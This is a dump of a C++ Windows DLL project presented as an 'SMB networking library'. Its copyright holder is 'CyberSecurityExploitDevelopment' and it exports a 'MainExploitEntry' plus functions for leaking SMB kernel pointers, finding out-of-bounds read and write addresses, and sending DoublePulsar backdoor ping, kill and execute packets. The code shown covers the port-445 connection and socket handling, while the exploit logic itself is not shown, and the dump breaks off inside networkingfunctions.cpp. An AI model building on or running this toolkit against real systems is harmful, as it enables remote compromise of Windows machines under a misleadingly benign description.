├── .gitignore
├── LICENSE
├── README.md
├── SMBLibrary.sln
├── SMBLibrary.vcxproj
├── SMBLibrary.vcxproj.filters
├── SMBLibrary.vcxproj.user
├── Source.cpp
├── Source.def
├── liscence.txt
├── networkingfunctions.cpp
├── ntcreateandx.h
├── sessionsetupandx.h
├── smb.h
├── smbmacros.h
├── smbpacketstrings.h
├── smbtransaction.h
├── smbutils.cpp
├── treeconnectandx.h
└── windowssocket.h
/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Compiled Object files
5 | *.slo
6 | *.lo
7 | *.o
8 | *.obj
9 |
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 |
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 |
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 |
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 | *.lib
28 |
29 | # Executables
30 | *.exe
31 | *.out
32 | *.app
33 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CyberSecurityExploitDevelopment
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SMBLibrary
2 | Windows CIFS/SMB packet generation and SMB networking library
3 |
--------------------------------------------------------------------------------
/SMBLibrary.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29509.3
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SMBLibrary", "SMBLibrary.vcxproj", "{58E932A3-2AC1-4148-8039-09762C601182}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x64.ActiveCfg = Debug|x64
17 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x64.Build.0 = Debug|x64
18 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x86.ActiveCfg = Debug|Win32
19 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x86.Build.0 = Debug|Win32
20 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x64.ActiveCfg = Release|x64
21 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x64.Build.0 = Release|x64
22 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x86.ActiveCfg = Release|Win32
23 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {41A8F98A-53DF-4CCF-BB68-5C02524966A7}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {58E932A3-2AC1-4148-8039-09762C601182}
24 | SMBLibrary
25 | 10.0
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v142
32 | MultiByte
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v142
38 | true
39 | MultiByte
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v142
45 | MultiByte
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v142
51 | true
52 | MultiByte
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | Disabled
77 | true
78 | true
79 |
80 |
81 | Console
82 | Source.def
83 |
84 |
85 |
86 |
87 | Level3
88 | Disabled
89 | true
90 | true
91 |
92 |
93 | Console
94 | Source.def
95 |
96 |
97 |
98 |
99 | Level3
100 | MaxSpeed
101 | true
102 | true
103 | true
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | Source.def
111 |
112 |
113 |
114 |
115 | Level3
116 | MaxSpeed
117 | true
118 | true
119 | true
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | Source.def
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 | Source Files
44 |
45 |
46 |
47 |
48 | Source Files
49 |
50 |
51 | Source Files
52 |
53 |
54 |
55 |
56 | Source Files
57 |
58 |
59 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\Windows\System32\rundll32.exe
5 | $(TargetPath),#1
6 | WindowsLocalDebugger
7 |
8 |
9 | C:\Windows\System32\rundll32.exe
10 | $(TargetPath),#1
11 | WindowsLocalDebugger
12 |
13 |
14 | C:\Windows\System32\rundll32.exe
15 | $(TargetPath),#1
16 | WindowsLocalDebugger
17 |
18 |
19 | C:\Windows\System32\rundll32.exe
20 | $(TargetPath),#1
21 | WindowsLocalDebugger
22 |
23 |
--------------------------------------------------------------------------------
/Source.cpp:
--------------------------------------------------------------------------------
1 | #include "smb.h"
2 |
3 | #pragma comment(lib, "ws2_32")
4 | #pragma comment(lib, "crypt32")
5 | #define NO_INLINING
6 |
7 | #ifdef NO_INLINING
8 | #pragma auto_inline(off)
9 | #endif // NO_INLINING
10 |
11 | #ifdef _DEBUG
12 | DWORD __stdcall dbgtests(PVOID pvip);
13 | #endif // _DEBUG
14 |
15 | #pragma warning(disable : 4267)
16 | #pragma warning(disable : 4244)
17 | #pragma warning(disable : 6387)
18 |
19 | INT_PTR __stdcall MainExploitEntry(void)
20 | {
21 | static STRING s;
22 | static UNICODE_STRING ipaddressarg, args;
23 | static HANDLE hthread;
24 | static DWORD dwtid, dwexitcode, argc;
25 | static INT_PTR status;
26 | ANYPOINTER p = { 0 }, argptr = { 0 }, * baseaddress = NULL;
27 | BUFFER tmp = { 0 }, bwsargs = { 0 };
28 | wchar_t* argv[2] = { NULL };
29 |
30 | InitUnicodeString(L"127.0.0.1", &args);
31 |
32 | *argv = GetCommandLineW();
33 | argv[1] = args.Buffer;
34 |
35 | if (GetUnsigned(&argc) >= 2)
36 | {
37 | bwsalloc(&tmp, wcslen(argv[1]) + sizeof(wchar_t));
38 | RtlCopyMemory(tmp.pbdata, argv[1], wcslen(argv[1]));
39 | if (!find_memory_pattern(&tmp, &p, L".", sizeof(wchar_t)))
40 | InitUnicodeString(L"127.0.0.1", &ipaddressarg);
41 | else
42 | InitUnicodeString(argv[1], &ipaddressarg);
43 | bwsfree(&tmp);
44 | p = { 0 };
45 | }
46 | else
47 | {
48 | InitUnicodeString(L"127.0.0.1", &ipaddressarg);
49 | }
50 |
51 | FreeUnicodeString(&args);
52 | ConvertUnicodeToString(&ipaddressarg, &s);
53 | FreeUnicodeString(&ipaddressarg);
54 |
55 | #ifdef _DEBUG
56 | hthread = CreateThread(NULL, 0, &dbgtests, s.Buffer, 0, &dwtid);
57 | #else
58 | // hthread = CreateThread(NULL, 0, , s.Buffer, 0, &dwtid);
59 | #endif // _DEBUG
60 |
61 | if (isnull(hthread))
62 | {
63 | FreeString(&s);
64 | PutUlongPtr(&status, STATUS_INVALID_HANDLE);
65 | return status;
66 | }
67 |
68 | WaitForSingleObject(hthread, INFINITE);
69 | GetExitCodeThread(hthread, &dwexitcode);
70 | CloseHandle(hthread);
71 | FreeString(&s);
72 |
73 | PutUlongPtr(&status, (ULONG_PTR)GetUlong(&dwexitcode));
74 | return status;
75 | }
76 |
77 |
78 | #ifdef _DEBUG
79 | DWORD __stdcall dbgtests(PVOID pvip)
80 | {
81 | return 0;
82 | }
83 | #endif // _DEBUG
84 |
85 | unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status)
86 | {
87 | typedef unsigned long(__stdcall* PFN_INET_ADDR)(const char* ip);
88 | s = NULL;
89 | sa = { 0 };
90 | wsa = { 0 };
91 | status = 0;
92 | HMODULE wsockdll = NULL;
93 | PFN_INET_ADDR pinet_addr = NULL;
94 |
95 | status = WSAStartup(MAKEWORD(2, 2), &wsa);
96 | if (status != 0)
97 | return MAKEUNSIGNED(WSAGetLastError());
98 |
99 | if (notnull(GetModuleHandleW(TEXT("ws2_32"))))
100 | {
101 | wsockdll = GetModuleHandleW(TEXT("ws2_32"));
102 | }
103 | else
104 | {
105 | wsockdll = LoadLibraryW(TEXT("ws2_32.dll"));
106 | }
107 |
108 | if (isnull(wsockdll))
109 | return STATUS_INVALID_HANDLE;
110 | else
111 | pinet_addr = (PFN_INET_ADDR)GetProcAddress(wsockdll, "inet_addr");
112 |
113 | if (isnull(pinet_addr))
114 | ExitProcess(STATUS_INVALID_HANDLE);
115 | else
116 | sa.sin_addr.s_addr = pinet_addr(targetip);
117 | sa.sin_family = AF_INET;
118 | sa.sin_port = htons(445);
119 |
120 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
121 |
122 | if (validsock(s))
123 | {
124 | status = connect(s, (sockaddr*)&sa, sizeof(sa));
125 | if (issockerr(status))
126 | {
127 | #ifdef _DEBUG
128 | fwprintf_s(stderr, TEXT("[%ws]:\t error 0x%08x occured when calling \"%ws\"\n"), __FUNCTIONW__, STATUS_FAIL, L"connect()");
129 | (VOID)SleepEx(2000, FALSE);
130 | ExitProcess(STATUS_FAIL);
131 | #else
132 | return MAKEUNSIGNED(STATUS_FAIL);
133 | #endif //_DEBUG
134 | }
135 | else
136 | {
137 | *(&status) &= 0;
138 | status = 0;
139 | return 0;
140 | }
141 |
142 | }
143 | else
144 | {
145 | return MAKEUNSIGNED(WSAGetLastError());
146 | }
147 |
148 | return STATUS_FAIL;
149 |
150 | }
151 |
152 | unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status)
153 | {
154 | status = 0;
155 |
156 | if (badsock(s))
157 | return MAKEUNSIGNED(WSAGetLastError());
158 |
159 | *(int*)(&status) = send(s, (const char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
160 | return status;
161 | }
162 |
163 | unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status)
164 | {
165 | bwsalloc(bws, bufsize);
166 |
167 | if (badsock(s))
168 | return MAKEUNSIGNED(WSAGetLastError());
169 |
170 | *(int*)(&status) = recv(s, (char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
171 | return status;
172 | }
173 |
174 | unsigned int CloseAndClearSocket(SOCKET IN OUT& sfd, BOOLEAN IN WSAClean)
175 | {
176 | unsigned status = 0;
177 | if (validsock(sfd))
178 | *(int *)(&status) = closesocket(sfd);
179 | sfd = 0;
180 | if (WSAClean)
181 | WSACleanup();
182 | return status;
183 | }
--------------------------------------------------------------------------------
/Source.def:
--------------------------------------------------------------------------------
1 | LIBRARY SMBLibrary.dll
2 |
3 |
4 | EXPORTS
5 | MainExploitEntry @1
6 |
7 | bwsalloc
8 | bwsfree
9 | bwscat
10 | bwsnew
11 | bwsdelete
12 | bwsallocateandcopy
13 |
14 | __memcmp
15 | find_memory_pattern
16 | update_smb_info
17 | csprng
18 | random
19 |
20 | FindLeakedTrans2DispatchTable
21 | GetDoublePulsarStatusCode
22 | GetDoublePulsarOpCode
23 | GenerateDoublePulsarOpcodePacket
24 | GetDoublePulsarXorKey
25 | GetOOBWriteAddress
26 | GenerateDoublePulsarTrans2SessionSetupParameters
27 | PadDoPuPayloadToProperSize
28 | GetAllOOBReadAddressesFromMultiRequest
29 | FindLeakedDataFragTag
30 | FindLeadedDataLStrTag
31 |
32 | InitString
33 | FreeString
34 | InitUnicodeString
35 | FreeUnicodeString
36 | ConvertStringToUnicode
37 | ConvertUnicodeToString
38 | DumpHex
39 |
40 | TargetConnect
41 | SendData
42 | RecvData
43 | CloseAndClearSocket
44 |
45 | negotiate_request_packet
46 | session_setup_packet
47 | tree_connect_packet
48 |
49 | trans2_session_setup_packet
50 | trans2_session_setup_dopu_kill
51 | trans2_session_setup_dopu_ping
52 | trans2_session_setup_dopu_exec
53 | tree_disconnect_packet
54 | logoff_andx_packet
55 |
56 | readfile
57 |
58 |
59 |
--------------------------------------------------------------------------------
/liscence.txt:
--------------------------------------------------------------------------------
1 | Attribution 4.0 International
2 |
3 | =======================================================================
4 |
5 | Creative Commons Corporation ("Creative Commons") is not a law firm and
6 | does not provide legal services or legal advice. Distribution of
7 | Creative Commons public licenses does not create a lawyer-client or
8 | other relationship. Creative Commons makes its licenses and related
9 | information available on an "as-is" basis. Creative Commons gives no
10 | warranties regarding its licenses, any material licensed under their
11 | terms and conditions, or any related information. Creative Commons
12 | disclaims all liability for damages resulting from their use to the
13 | fullest extent possible.
14 |
15 | Using Creative Commons Public Licenses
16 |
17 | Creative Commons public licenses provide a standard set of terms and
18 | conditions that creators and other rights holders may use to share
19 | original works of authorship and other material subject to copyright
20 | and certain other rights specified in the public license below. The
21 | following considerations are for informational purposes only, are not
22 | exhaustive, and do not form part of our licenses.
23 |
24 | Considerations for licensors: Our public licenses are
25 | intended for use by those authorized to give the public
26 | permission to use material in ways otherwise restricted by
27 | copyright and certain other rights. Our licenses are
28 | irrevocable. Licensors should read and understand the terms
29 | and conditions of the license they choose before applying it.
30 | Licensors should also secure all rights necessary before
31 | applying our licenses so that the public can reuse the
32 | material as expected. Licensors should clearly mark any
33 | material not subject to the license. This includes other CC-
34 | licensed material, or material used under an exception or
35 | limitation to copyright. More considerations for licensors:
36 | wiki.creativecommons.org/Considerations_for_licensors
37 |
38 | Considerations for the public: By using one of our public
39 | licenses, a licensor grants the public permission to use the
40 | licensed material under specified terms and conditions. If
41 | the licensor's permission is not necessary for any reason--for
42 | example, because of any applicable exception or limitation to
43 | copyright--then that use is not regulated by the license. Our
44 | licenses grant only permissions under copyright and certain
45 | other rights that a licensor has authority to grant. Use of
46 | the licensed material may still be restricted for other
47 | reasons, including because others have copyright or other
48 | rights in the material. A licensor may make special requests,
49 | such as asking that all changes be marked or described.
50 | Although not required by our licenses, you are encouraged to
51 | respect those requests where reasonable. More considerations
52 | for the public:
53 | wiki.creativecommons.org/Considerations_for_licensees
54 |
55 | =======================================================================
56 |
57 | Creative Commons Attribution 4.0 International Public License
58 |
59 | By exercising the Licensed Rights (defined below), You accept and agree
60 | to be bound by the terms and conditions of this Creative Commons
61 | Attribution 4.0 International Public License ("Public License"). To the
62 | extent this Public License may be interpreted as a contract, You are
63 | granted the Licensed Rights in consideration of Your acceptance of
64 | these terms and conditions, and the Licensor grants You such rights in
65 | consideration of benefits the Licensor receives from making the
66 | Licensed Material available under these terms and conditions.
67 |
68 |
69 | Section 1 -- Definitions.
70 |
71 | a. Adapted Material means material subject to Copyright and Similar
72 | Rights that is derived from or based upon the Licensed Material
73 | and in which the Licensed Material is translated, altered,
74 | arranged, transformed, or otherwise modified in a manner requiring
75 | permission under the Copyright and Similar Rights held by the
76 | Licensor. For purposes of this Public License, where the Licensed
77 | Material is a musical work, performance, or sound recording,
78 | Adapted Material is always produced where the Licensed Material is
79 | synched in timed relation with a moving image.
80 |
81 | b. Adapter's License means the license You apply to Your Copyright
82 | and Similar Rights in Your contributions to Adapted Material in
83 | accordance with the terms and conditions of this Public License.
84 |
85 | c. Copyright and Similar Rights means copyright and/or similar rights
86 | closely related to copyright including, without limitation,
87 | performance, broadcast, sound recording, and Sui Generis Database
88 | Rights, without regard to how the rights are labeled or
89 | categorized. For purposes of this Public License, the rights
90 | specified in Section 2(b)(1)-(2) are not Copyright and Similar
91 | Rights.
92 |
93 | d. Effective Technological Measures means those measures that, in the
94 | absence of proper authority, may not be circumvented under laws
95 | fulfilling obligations under Article 11 of the WIPO Copyright
96 | Treaty adopted on December 20, 1996, and/or similar international
97 | agreements.
98 |
99 | e. Exceptions and Limitations means fair use, fair dealing, and/or
100 | any other exception or limitation to Copyright and Similar Rights
101 | that applies to Your use of the Licensed Material.
102 |
103 | f. Licensed Material means the artistic or literary work, database,
104 | or other material to which the Licensor applied this Public
105 | License.
106 |
107 | g. Licensed Rights means the rights granted to You subject to the
108 | terms and conditions of this Public License, which are limited to
109 | all Copyright and Similar Rights that apply to Your use of the
110 | Licensed Material and that the Licensor has authority to license.
111 |
112 | h. Licensor means the individual(s) or entity(ies) granting rights
113 | under this Public License.
114 |
115 | i. Share means to provide material to the public by any means or
116 | process that requires permission under the Licensed Rights, such
117 | as reproduction, public display, public performance, distribution,
118 | dissemination, communication, or importation, and to make material
119 | available to the public including in ways that members of the
120 | public may access the material from a place and at a time
121 | individually chosen by them.
122 |
123 | j. Sui Generis Database Rights means rights other than copyright
124 | resulting from Directive 96/9/EC of the European Parliament and of
125 | the Council of 11 March 1996 on the legal protection of databases,
126 | as amended and/or succeeded, as well as other essentially
127 | equivalent rights anywhere in the world.
128 |
129 | k. You means the individual or entity exercising the Licensed Rights
130 | under this Public License. Your has a corresponding meaning.
131 |
132 |
133 | Section 2 -- Scope.
134 |
135 | a. License grant.
136 |
137 | 1. Subject to the terms and conditions of this Public License,
138 | the Licensor hereby grants You a worldwide, royalty-free,
139 | non-sublicensable, non-exclusive, irrevocable license to
140 | exercise the Licensed Rights in the Licensed Material to:
141 |
142 | a. reproduce and Share the Licensed Material, in whole or
143 | in part; and
144 |
145 | b. produce, reproduce, and Share Adapted Material.
146 |
147 | 2. Exceptions and Limitations. For the avoidance of doubt, where
148 | Exceptions and Limitations apply to Your use, this Public
149 | License does not apply, and You do not need to comply with
150 | its terms and conditions.
151 |
152 | 3. Term. The term of this Public License is specified in Section
153 | 6(a).
154 |
155 | 4. Media and formats; technical modifications allowed. The
156 | Licensor authorizes You to exercise the Licensed Rights in
157 | all media and formats whether now known or hereafter created,
158 | and to make technical modifications necessary to do so. The
159 | Licensor waives and/or agrees not to assert any right or
160 | authority to forbid You from making technical modifications
161 | necessary to exercise the Licensed Rights, including
162 | technical modifications necessary to circumvent Effective
163 | Technological Measures. For purposes of this Public License,
164 | simply making modifications authorized by this Section 2(a)
165 | (4) never produces Adapted Material.
166 |
167 | 5. Downstream recipients.
168 |
169 | a. Offer from the Licensor -- Licensed Material. Every
170 | recipient of the Licensed Material automatically
171 | receives an offer from the Licensor to exercise the
172 | Licensed Rights under the terms and conditions of this
173 | Public License.
174 |
175 | b. No downstream restrictions. You may not offer or impose
176 | any additional or different terms or conditions on, or
177 | apply any Effective Technological Measures to, the
178 | Licensed Material if doing so restricts exercise of the
179 | Licensed Rights by any recipient of the Licensed
180 | Material.
181 |
182 | 6. No endorsement. Nothing in this Public License constitutes or
183 | may be construed as permission to assert or imply that You
184 | are, or that Your use of the Licensed Material is, connected
185 | with, or sponsored, endorsed, or granted official status by,
186 | the Licensor or others designated to receive attribution as
187 | provided in Section 3(a)(1)(A)(i).
188 |
189 | b. Other rights.
190 |
191 | 1. Moral rights, such as the right of integrity, are not
192 | licensed under this Public License, nor are publicity,
193 | privacy, and/or other similar personality rights; however, to
194 | the extent possible, the Licensor waives and/or agrees not to
195 | assert any such rights held by the Licensor to the limited
196 | extent necessary to allow You to exercise the Licensed
197 | Rights, but not otherwise.
198 |
199 | 2. Patent and trademark rights are not licensed under this
200 | Public License.
201 |
202 | 3. To the extent possible, the Licensor waives any right to
203 | collect royalties from You for the exercise of the Licensed
204 | Rights, whether directly or through a collecting society
205 | under any voluntary or waivable statutory or compulsory
206 | licensing scheme. In all other cases the Licensor expressly
207 | reserves any right to collect such royalties.
208 |
209 |
210 | Section 3 -- License Conditions.
211 |
212 | Your exercise of the Licensed Rights is expressly made subject to the
213 | following conditions.
214 |
215 | a. Attribution.
216 |
217 | 1. If You Share the Licensed Material (including in modified
218 | form), You must:
219 |
220 | a. retain the following if it is supplied by the Licensor
221 | with the Licensed Material:
222 |
223 | i. identification of the creator(s) of the Licensed
224 | Material and any others designated to receive
225 | attribution, in any reasonable manner requested by
226 | the Licensor (including by pseudonym if
227 | designated);
228 |
229 | ii. a copyright notice;
230 |
231 | iii. a notice that refers to this Public License;
232 |
233 | iv. a notice that refers to the disclaimer of
234 | warranties;
235 |
236 | v. a URI or hyperlink to the Licensed Material to the
237 | extent reasonably practicable;
238 |
239 | b. indicate if You modified the Licensed Material and
240 | retain an indication of any previous modifications; and
241 |
242 | c. indicate the Licensed Material is licensed under this
243 | Public License, and include the text of, or the URI or
244 | hyperlink to, this Public License.
245 |
246 | 2. You may satisfy the conditions in Section 3(a)(1) in any
247 | reasonable manner based on the medium, means, and context in
248 | which You Share the Licensed Material. For example, it may be
249 | reasonable to satisfy the conditions by providing a URI or
250 | hyperlink to a resource that includes the required
251 | information.
252 |
253 | 3. If requested by the Licensor, You must remove any of the
254 | information required by Section 3(a)(1)(A) to the extent
255 | reasonably practicable.
256 |
257 | 4. If You Share Adapted Material You produce, the Adapter's
258 | License You apply must not prevent recipients of the Adapted
259 | Material from complying with this Public License.
260 |
261 |
262 | Section 4 -- Sui Generis Database Rights.
263 |
264 | Where the Licensed Rights include Sui Generis Database Rights that
265 | apply to Your use of the Licensed Material:
266 |
267 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right
268 | to extract, reuse, reproduce, and Share all or a substantial
269 | portion of the contents of the database;
270 |
271 | b. if You include all or a substantial portion of the database
272 | contents in a database in which You have Sui Generis Database
273 | Rights, then the database in which You have Sui Generis Database
274 | Rights (but not its individual contents) is Adapted Material; and
275 |
276 | c. You must comply with the conditions in Section 3(a) if You Share
277 | all or a substantial portion of the contents of the database.
278 |
279 | For the avoidance of doubt, this Section 4 supplements and does not
280 | replace Your obligations under this Public License where the Licensed
281 | Rights include other Copyright and Similar Rights.
282 |
283 |
284 | Section 5 -- Disclaimer of Warranties and Limitation of Liability.
285 |
286 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
287 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
288 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
289 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
290 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
291 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
292 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
293 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
294 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
295 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
296 |
297 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
298 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
299 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
300 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
301 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
302 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
303 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
304 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
305 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
306 |
307 | c. The disclaimer of warranties and limitation of liability provided
308 | above shall be interpreted in a manner that, to the extent
309 | possible, most closely approximates an absolute disclaimer and
310 | waiver of all liability.
311 |
312 |
313 | Section 6 -- Term and Termination.
314 |
315 | a. This Public License applies for the term of the Copyright and
316 | Similar Rights licensed here. However, if You fail to comply with
317 | this Public License, then Your rights under this Public License
318 | terminate automatically.
319 |
320 | b. Where Your right to use the Licensed Material has terminated under
321 | Section 6(a), it reinstates:
322 |
323 | 1. automatically as of the date the violation is cured, provided
324 | it is cured within 30 days of Your discovery of the
325 | violation; or
326 |
327 | 2. upon express reinstatement by the Licensor.
328 |
329 | For the avoidance of doubt, this Section 6(b) does not affect any
330 | right the Licensor may have to seek remedies for Your violations
331 | of this Public License.
332 |
333 | c. For the avoidance of doubt, the Licensor may also offer the
334 | Licensed Material under separate terms or conditions or stop
335 | distributing the Licensed Material at any time; however, doing so
336 | will not terminate this Public License.
337 |
338 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
339 | License.
340 |
341 |
342 | Section 7 -- Other Terms and Conditions.
343 |
344 | a. The Licensor shall not be bound by any additional or different
345 | terms or conditions communicated by You unless expressly agreed.
346 |
347 | b. Any arrangements, understandings, or agreements regarding the
348 | Licensed Material not stated herein are separate from and
349 | independent of the terms and conditions of this Public License.
350 |
351 |
352 | Section 8 -- Interpretation.
353 |
354 | a. For the avoidance of doubt, this Public License does not, and
355 | shall not be interpreted to, reduce, limit, restrict, or impose
356 | conditions on any use of the Licensed Material that could lawfully
357 | be made without permission under this Public License.
358 |
359 | b. To the extent possible, if any provision of this Public License is
360 | deemed unenforceable, it shall be automatically reformed to the
361 | minimum extent necessary to make it enforceable. If the provision
362 | cannot be reformed, it shall be severed from this Public License
363 | without affecting the enforceability of the remaining terms and
364 | conditions.
365 |
366 | c. No term or condition of this Public License will be waived and no
367 | failure to comply consented to unless expressly agreed to by the
368 | Licensor.
369 |
370 | d. Nothing in this Public License constitutes or may be interpreted
371 | as a limitation upon, or waiver of, any privileges and immunities
372 | that apply to the Licensor or You, including from the legal
373 | processes of any jurisdiction or authority.
374 |
375 |
376 | =======================================================================
377 |
378 | Creative Commons is not a party to its public
379 | licenses. Notwithstanding, Creative Commons may elect to apply one of
380 | its public licenses to material it publishes and in those instances
381 | will be considered the “Licensor.” The text of the Creative Commons
382 | public licenses is dedicated to the public domain under the CC0 Public
383 | Domain Dedication. Except for the limited purpose of indicating that
384 | material is shared under a Creative Commons public license or as
385 | otherwise permitted by the Creative Commons policies published at
386 | creativecommons.org/policies, Creative Commons does not authorize the
387 | use of the trademark "Creative Commons" or any other trademark or logo
388 | of Creative Commons without its prior written consent including,
389 | without limitation, in connection with any unauthorized modifications
390 | to any of its public licenses or any other arrangements,
391 | understandings, or agreements concerning use of licensed material. For
392 | the avoidance of doubt, this paragraph does not form part of the
393 | public licenses.
394 |
395 | Creative Commons may be contacted at creativecommons.org.
--------------------------------------------------------------------------------
/networkingfunctions.cpp:
--------------------------------------------------------------------------------
1 | #include "smb.h"
2 |
3 | #pragma warning(push)
4 | #pragma warning(disable : 6387)
5 | //#pragma warning(disable : )
6 |
7 | /*
8 | unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status)
9 | {
10 | typedef unsigned long(__stdcall* PFN_INET_ADDR)(const char* ip);
11 | s = NULL;
12 | sa = { 0 };
13 | wsa = { 0 };
14 | status = 0;
15 | HMODULE wsockdll = NULL;
16 | PFN_INET_ADDR pinet_addr = NULL;
17 |
18 | status = WSAStartup(MAKEWORD(2, 2), &wsa);
19 | if (status != 0)
20 | return MAKEUNSIGNED(WSAGetLastError());
21 |
